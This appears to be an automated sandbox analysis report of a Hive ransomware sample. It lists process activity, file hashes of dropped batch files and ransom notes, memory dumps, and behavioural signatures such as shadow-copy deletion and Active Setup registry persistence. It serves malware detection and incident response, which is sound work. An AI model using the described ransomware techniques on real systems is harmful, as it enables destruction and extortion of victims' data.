C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

Network

N/A

Files

memory/3020-0-0x0000000000B10000-0x0000000000DE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5 6358d970c3edccb57eae7dbf9f42d58f
SHA1 25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5 df5552357692e0cba5e69f8fbf06abb6
SHA1 4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256 d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512 a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

memory/3020-73-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-85-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-558-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-1721-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-2906-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-3560-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4326-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4335-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4336-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4337-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-4338-0x0000000000B10000-0x0000000000DE9000-memory.dmp

C:\$Recycle.Bin\HOW_TO_DECRYPT.txt

MD5 ee4ad142674725d6d9b58c9c3bb836dc
SHA1 ac9bac37131c72a549d2bf3fbd233061906d5fab
SHA256 fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776
SHA512 a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3

memory/3020-5668-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-8139-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-10988-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11884-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11885-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11887-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11890-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11891-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11894-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11895-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11897-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11899-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11901-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11903-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11905-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11907-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11909-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11912-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11914-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11916-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11918-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11920-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11923-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11925-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11927-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11929-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11931-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11933-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11935-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11937-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11939-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11942-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11944-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11946-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11948-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11951-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11953-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11975-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11978-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11980-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-11982-0x0000000000B10000-0x0000000000DE9000-memory.dmp

memory/3020-12008-0x0000000000B10000-0x0000000000DE9000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:12

Platform

win10v2004-20240508-en

Max time kernel

1779s

Max time network

1792s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hive

ransomware hive

Deletes shadow copies

ransomware defense_evasion impact execution

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\DriverData\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
